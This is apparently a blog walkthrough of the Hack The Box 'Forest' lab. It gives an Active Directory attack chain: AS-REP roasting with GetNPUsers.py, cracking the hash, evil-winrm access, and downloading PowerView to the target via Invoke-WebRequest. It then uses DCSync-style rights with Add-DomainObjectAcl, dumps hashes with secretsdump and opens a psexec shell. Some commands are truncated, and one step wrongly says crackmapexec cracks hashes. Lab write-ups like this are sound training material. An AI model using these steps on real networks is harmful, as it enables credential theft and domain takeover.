HTB Forrest




A Domain Controller for the htb.local is found



Found a service account.
Found a service account

Let’s do a test for discovering a user that does not require a pre-Authentication

Create a user list with the found users.

Start up kerbrute

The user accounts that are enabled with no pre-Authentication, it’s vulnerable to AS-REP Roasting attack.

Use the Impackt GetNPUsers.py from here.

Run the python script to dump out the hash.

./GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip

Use John to crack the hash.

Use evil-winrm to gain access.

First flag is found.

Use the bloodhound python script to collect JSON data for the Bloodhound app

Load the data to Bloodhound and look at svs-alfresco data

The node belongs to the account operators group.

Account Operators group are allowed create and modify users and add them to non-protected groups.

Download the Powerspoilt dev module from github and start a python server to transfer the PowerView script to the windows box.

powershell Invoke-WebRequest -Uri -OutFile PowerView.ps1

Input the following commands

$pass = convertto-securestring 'password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ('HTB\persecure', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity persecure -

Use secretsdump.py to get the hashes.

Crack the hash with crackmapexec

Use psexec.py to gain a shell.

Root flag is found.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: